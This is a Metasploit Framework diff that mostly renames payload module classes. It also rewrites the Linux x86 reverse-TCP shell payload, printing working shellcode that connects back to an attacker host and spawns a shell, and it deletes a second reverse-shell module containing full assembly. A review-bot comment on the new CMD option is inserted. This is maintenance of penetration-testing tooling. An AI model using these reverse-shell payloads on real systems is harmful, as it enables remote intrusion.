-module Metasploit3 +module MetasploitModule CachedSize = 208 
diff --git a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb index 286b9c043e..a1f555ed66 100644 --- a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 172 diff --git a/modules/payloads/singles/linux/mipsbe/exec.rb b/modules/payloads/singles/linux/mipsbe/exec.rb index 0d7f26d720..4a68161bce 100644 --- a/modules/payloads/singles/linux/mipsbe/exec.rb +++ b/modules/payloads/singles/linux/mipsbe/exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 52 diff --git a/modules/payloads/singles/linux/mipsbe/reboot.rb b/modules/payloads/singles/linux/mipsbe/reboot.rb index f245836ec6..c0f93f5b2e 100644 --- a/modules/payloads/singles/linux/mipsbe/reboot.rb +++ b/modules/payloads/singles/linux/mipsbe/reboot.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 32 diff --git a/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb index f904e76eaf..e196576a12 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 232 diff --git a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb index 36692d22dc..d1562f9cc4 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb 
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 184 diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb index a2b1440a21..431b992815 100644 --- a/modules/payloads/singles/linux/mipsle/exec.rb +++ b/modules/payloads/singles/linux/mipsle/exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 52 diff --git a/modules/payloads/singles/linux/mipsle/reboot.rb b/modules/payloads/singles/linux/mipsle/reboot.rb index c479778455..bb93cdf2e0 100644 --- a/modules/payloads/singles/linux/mipsle/reboot.rb +++ b/modules/payloads/singles/linux/mipsle/reboot.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 32 diff --git a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb index 4beb549cac..81961f8a90 100644 --- a/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 232 diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index 6d240561fa..74fa0975ed 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 184 
diff --git a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb index fe9f16e824..6769b0623b 100644 --- a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 223 diff --git a/modules/payloads/singles/linux/ppc/shell_find_port.rb b/modules/payloads/singles/linux/ppc/shell_find_port.rb index 32c5f401bb..2f12236ae8 100644 --- a/modules/payloads/singles/linux/ppc/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 171 diff --git a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb index 01c5f74c98..a883f94dfa 100644 --- a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 183 diff --git a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb index d460648361..d9d755c37e 100644 --- a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 223 
diff --git a/modules/payloads/singles/linux/ppc64/shell_find_port.rb b/modules/payloads/singles/linux/ppc64/shell_find_port.rb index 61a29a463f..57ea9cd295 100644 --- a/modules/payloads/singles/linux/ppc64/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc64/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 171 diff --git a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb index a3ef4a702e..d838d9f724 100644 --- a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 183 diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb index 69630f74bf..f42e589589 100644 --- a/modules/payloads/singles/linux/x64/exec.rb +++ b/modules/payloads/singles/linux/x64/exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 47 diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb index 06ab4b7e5c..c7a2765330 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 86 diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb index 7eaffef23f..07073dfe83 100644 
--- a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 57 diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb index 1ef8911778..9fc74d4381 100644 --- a/modules/payloads/singles/linux/x64/shell_find_port.rb +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 91 diff --git a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb index 860826c427..2b70a9dd60 100644 --- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 74 diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb index 064b5ca314..2a82a0d458 100644 --- a/modules/payloads/singles/linux/x86/adduser.rb +++ b/modules/payloads/singles/linux/x86/adduser.rb @@ -15,7 +15,7 @@ require 'msf/core' # Adds a UID 0 user to /etc/passwd. # ### -module Metasploit3 +module MetasploitModule CachedSize = 97 diff --git a/modules/payloads/singles/linux/x86/chmod.rb b/modules/payloads/singles/linux/x86/chmod.rb index 6ed4ea11a0..b2cf018252 100644 --- a/modules/payloads/singles/linux/x86/chmod.rb +++ b/modules/payloads/singles/linux/x86/chmod.rb @@ -10,7 +10,7 @@ require 'msf/core' # # Kris Katterjohn - 03/03/2008 ### -module Metasploit3 +module MetasploitModule CachedSize = 36 
diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index d81ac237ad..d4a12e8d2a 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -13,7 +13,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 43 diff --git a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb index ef79d117ed..9f1f1f351f 100644 --- a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/meterpreter_x86_linux' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb index a84023cfe1..8cb0c265f1 100644 --- a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_x86_linux' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/linux/x86/read_file.rb b/modules/payloads/singles/linux/x86/read_file.rb index 6d9a0a9b89..e51b91f598 100644 --- a/modules/payloads/singles/linux/x86/read_file.rb +++ b/modules/payloads/singles/linux/x86/read_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 63 diff --git a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb index af469cfebf..135d77a7d8 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb 
+++ b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 90 diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb index f6f90ce56f..c50a672018 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 78 diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb index 13c7b39632..e5e2a7f3f9 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 57 diff --git a/modules/payloads/singles/linux/x86/shell_find_port.rb b/modules/payloads/singles/linux/x86/shell_find_port.rb index 4961b81e72..f76634a2ff 100644 --- a/modules/payloads/singles/linux/x86/shell_find_port.rb +++ b/modules/payloads/singles/linux/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 62 diff --git a/modules/payloads/singles/linux/x86/shell_find_tag.rb b/modules/payloads/singles/linux/x86/shell_find_tag.rb index 9a525d5e3b..3d2e84af78 100644 --- a/modules/payloads/singles/linux/x86/shell_find_tag.rb +++ b/modules/payloads/singles/linux/x86/shell_find_tag.rb 
@@ -8,7 +8,7 @@ require 'msf/core/handler/find_tag' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 69 diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index 3b1310ffe6..3e888459dc 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 68 
@@ -20,56 +20,65 @@ module Metasploit3 super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', 'Description' => 'Connect back to attacker and spawn a command shell', - 'Author' => 'Ramon de C Valle', + 'Author' => ['Ramon de C Valle', 'joev'], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::CommandShellUnix, - 'Payload' => - { - 'Offsets' => - { - 'LHOST' => [ 25, 'ADDR' ], - 'LPORT' => [ 32, 'n' ], - }, - 'Payload' => - "\x31\xdb" +# xor ebx,ebx - "\xf7\xe3" +# mul ebx - "\x53" +# push ebx - "\x43" +# inc ebx - "\x53" +# push ebx - "\x6a\x02" +# push byte +0x2 - "\x89\xe1" +# mov ecx,esp - "\xb0\x66" +# mov al,0x66 - "\xcd\x80" +# int 0x80 - "\x93" +# xchg eax,ebx - "\x59" +# pop ecx - "\xb0\x3f" +# mov al,0x3f - "\xcd\x80" +# int 0x80 - "\x49" +# dec ecx - "\x79\xf9" +# jns 0x11 - "\x68\x7f\x00\x00\x01" +# push dword 0x100007f - "\x68\x02\x00\xbf\xbf" +# push dword 0xbfbf0002 - "\x89\xe1" +# mov ecx,esp - "\xb0\x66" +# mov al,0x66 - "\x50" +# push eax - "\x51" +# push ecx - "\x53" +# push ebx - "\xb3\x03" +# mov bl,0x3 - "\x89\xe1" +# mov ecx,esp - "\xcd\x80" +# int 0x80 - "\x52" +# push edx - "\x68\x2f\x2f\x73\x68" +# push dword 0x68732f2f - "\x68\x2f\x62\x69\x6e" +# push dword 0x6e69622f - "\x89\xe3" +# mov ebx,esp - "\x52" +# push edx - "\x53" +# push ebx - "\x89\xe1" +# mov ecx,esp - "\xb0\x0b" +# mov al,0xb - "\xcd\x80" # int 0x80 - } - )) + 'Session' => Msf::Sessions::CommandShellUnix + )) + + register_options([ + OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ]) + ]) + end + + def generate + # pad the shell path to a multiple of 4 with slashes + shell = datastore['CMD'] + remainder = shell.bytes.length % 4 + if remainder == 0 then remainder = 4 end + shell_padded = ("/" * (4-remainder)) + shell + + "\x31\xdb" +# xor ebx,ebx + "\xf7\xe3" +# mul ebx + "\x53" +# push ebx + "\x43" +# inc ebx + "\x53" +# push ebx + "\x6a\x02" +# 
push byte +0x2 + "\x89\xe1" +# mov ecx,esp + "\xb0\x66" +# mov al,0x66 (sys_socketcall) + "\xcd\x80" +# int 0x80 + "\x93" +# xchg eax,ebx + "\x59" +# pop ecx + "\xb0\x3f" +# mov al,0x3f (sys_dup2) + "\xcd\x80" +# int 0x80 + "\x49" +# dec ecx + "\x79\xf9" +# jns 0x11 + "\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + # push ip addr + "\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + # push port + "\x89\xe1" +# mov ecx,esp + "\xb0\x66" +# mov al,0x66 (sys_socketcall) + "\x50" +# push eax + "\x51" +# push ecx + "\x53" +# push ebx + "\xb3\x03" +# mov bl,0x3 + "\x89\xe1" +# mov ecx,esp + "\xcd\x80" +# int 0x80 + "\x52" +# push edx + + # Split shellname into 4-byte words and push them one-by-one + # on to the stack + shell_padded.bytes.reverse.each_slice(4).map do |word| + "\x68" + word.reverse.pack('C*') + end.join + + + "\x89\xe3" +# mov ebx,esp + "\x52" +# push edx + "\x53" +# push ebx + "\x89\xe1" +# mov ecx,esp + "\xb0\x0b" +# mov al,0xb (execve) + "\xcd\x80" # int 0x80 end end diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb deleted file mode 100644 index d31c4ccc7c..0000000000 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb +++ /dev/null 
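Review bot: The new `CMD` option is described as "The command string to execute", but `generate` appears to use the value only as a program path: it is left-padded with `/` to a multiple of four bytes and pushed as one string ahead of the `execve` call, so a value with arguments or a relative path would not behave as the description reads. I would reword the option, for example `OptString.new('CMD', [ true, "Absolute path of the program to run (no arguments)", "/bin/sh" ])`, and add a comment above `generate` stating that contract and that the padding assumes a leading `/`. The generated length now depends on `CMD`, so `CachedSize = 68` in this file's first hunk presumably holds only for the default value; that is worth confirming against how the framework checks cached sizes. As a style point, `[datastore['LPORT'].to_i].pack('S>')` is equivalent to `pack('n')`, the usual spelling for a network-order port. `initialize` starts before this hunk, so whether `ipaddr` is required for `IPAddr.new` cannot be checked from here.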
@@ -1,98 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'metasm' -require 'msf/core' -require 'msf/core/handler/reverse_tcp' -require 'msf/base/sessions/command_shell' -require 'msf/base/sessions/command_shell_options' - -module Metasploit3 - - CachedSize = 70 - - include Msf::Payload::Single - include Msf::Payload::Linux - include Msf::Sessions::CommandShellOptions - - def initialize(info = {}) - -# Remark: this function seems to be called a LOT, even before the shellcode is used. -# We would better implement some caching. - -# We decoded skape's shellcode by using irb -r metasm-shell -# and: puts shellcode.decode - super(merge_info(info, - 'Name' => 'Linux Command Shell, Reverse TCP Inline - Metasm Demo', - 'Description' => 'Connect back to attacker and spawn a command shell', - 'Author' => ['skape', 'Yoann Guillot', 'Julien Tinnes <julien[at]cr0.org>'], - 'License' => MSF_LICENSE, - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::CommandShellUnix, - 'Payload' => - { - 'Offsets' => - { - 'LHOST' => [ 0, 'ADDR' ], - 'LPORT' => [ 0, 'n' ], - }, - 'Assembly' => <<EOS - xor ebx, ebx ; @00000000 31db - push ebx ; @00000002 53 - inc ebx ; @00000003 43 - push ebx ; @00000004 53 - push 2 ; @00000005 6a02 - push 66h ; @00000007 6a66 - pop eax ; @00000009 58 - mov ecx, esp ; @0000000a 89e1 - int 80h ; @0000000c cd80 - xchg ebx, eax ; @0000000e 93 - pop ecx ; @0000000f 59 - - ; Xrefs: 0000000f, 00000015 -xref_00000010_uuidfdbd8: - mov al, 3fh ; @00000010 b03f - int 80h ; @00000012 cd80 - dec ecx ; @00000014 49 - jns xref_00000010_uuidfdbd8 ; @00000015 79f9 -- to 10h - - ; Xrefs: 00000015 - pop ebx ; @00000017 5b - pop edx ; @00000018 5a - push LHOST ; @00000019 687f000001 - push.i16 LPORT ; @0000001e 6668bfbf - inc ebx ; @00000022 43 - push bx ; @00000023 6653 - mov ecx, esp ; @00000025 89e1 - 
mov al, 66h ; @00000027 b066 - push eax ; @00000029 50 - push ecx ; @0000002a 51 - push ebx ; @0000002b 53 - mov ecx, esp ; @0000002c 89e1 - inc ebx ; @0000002e 43 - int 80h ; @0000002f cd80 - push edx ; @00000031 52 - push 68732f2fh ; @00000032 682f2f7368 - push 6e69622fh ; @00000037 682f62696e - mov ebx, esp ; @0000003c 89e3 - push edx ; @0000003e 52 - push ebx ; @0000003f 53 - mov ecx, esp ; @00000040 89e1 - mov al, 0bh ; @00000042 b00b - int 80h ; @00000044 cd80 -EOS - } - )) - end - - - # hardcode the size of the encoded payload, otherwise the shellcode is assembled during msf initialization - def size - #puts "size of #{name}: #{super()}" - 103 - end -end diff --git a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb index 66c692ff96..b99eddb02e 100644 --- a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/mainframe_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 339 diff --git a/modules/payloads/singles/nodejs/shell_bind_tcp.rb b/modules/payloads/singles/nodejs/shell_bind_tcp.rb index 8329175ca4..678f5b9742 100644 --- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb @@ -12,7 +12,7 @@ require 'msf/core/payload/nodejs' require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' -module Metasploit3 +module MetasploitModule CachedSize = 456 diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb index b7cf44698d..7e4b4c4da1 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb 
@@ -12,7 +12,7 @@ require 'msf/core/payload/nodejs'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
-module Metasploit3
+module MetasploitModule
 CachedSize = 488
diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
index 140ccdfa85..b882a0d084 100644
--- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 516
diff --git a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb
index 278f72a760..8df43d658b 100644
--- a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb
+++ b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 200
diff --git a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb
index 86aee3cfc5..408b2e1fd2 100644
--- a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 152
diff --git a/modules/payloads/singles/osx/armle/vibrate.rb b/modules/payloads/singles/osx/armle/vibrate.rb
index aaa15641e3..c5457a8d6d 100644
--- a/modules/payloads/singles/osx/armle/vibrate.rb
+++ b/modules/payloads/singles/osx/armle/vibrate.rb
@@ -7,7 +7,7 @@ require 'msf/core'
-module Metasploit3
+module MetasploitModule
 CachedSize = 16
diff --git a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb
index 90c8ebed6f..d19475a5f0 100644
--- a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb
+++ b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 224
diff --git a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb
index 4973454069..93b6fd73c9 100644
--- a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 164
diff --git a/modules/payloads/singles/osx/x64/exec.rb b/modules/payloads/singles/osx/x64/exec.rb
index 126b9b4433..c87e29badd 100644
--- a/modules/payloads/singles/osx/x64/exec.rb
+++ b/modules/payloads/singles/osx/x64/exec.rb
@@ -6,7 +6,7 @@ require 'msf/core'
-module Metasploit3
+module MetasploitModule
 CachedSize = 31
diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb
index a270e4ee5a..09532e4ec3 100644
--- a/modules/payloads/singles/osx/x64/say.rb
+++ b/modules/payloads/singles/osx/x64/say.rb
@@ -6,7 +6,7 @@ require 'msf/core'
-module Metasploit3
+module MetasploitModule
 CachedSize = 53
diff --git a/modules/payloads/singles/osx/x64/shell_bind_tcp.rb b/modules/payloads/singles/osx/x64/shell_bind_tcp.rb
index 246bbcc2b2..e4d1f0dcc3 100644
--- a/modules/payloads/singles/osx/x64/shell_bind_tcp.rb
+++ b/modules/payloads/singles/osx/x64/shell_bind_tcp.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/bind_tcp'
-module Metasploit3
+module MetasploitModule
 CachedSize = 136
diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb
index e10354938a..5a4644b817 100644
--- a/modules/payloads/singles/osx/x64/shell_find_tag.rb
+++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/find_tag'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 107
diff --git a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
index 13e4586d5b..ace5a6988a 100644
--- a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
-module Metasploit3
+module MetasploitModule
 CachedSize = 108
diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb
index 688f654fb0..65a42cb5bd 100644
--- a/modules/payloads/singles/osx/x86/exec.rb
+++ b/modules/payloads/singles/osx/x86/exec.rb
@@ -14,7 +14,7 @@ require 'msf/core'
 # Executes an arbitrary command.
 #
 ###
-module Metasploit3
+module MetasploitModule
 CachedSize = 24
diff --git a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb
index 3ceef27567..3cdd12ad3e 100644
--- a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb
+++ b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
-module Metasploit3
+module MetasploitModule
 CachedSize = 74
diff --git a/modules/payloads/singles/osx/x86/shell_find_port.rb b/modules/payloads/singles/osx/x86/shell_find_port.rb
index a73ce6d16a..2304a33ea8 100644
--- a/modules/payloads/singles/osx/x86/shell_find_port.rb
+++ b/modules/payloads/singles/osx/x86/shell_find_port.rb
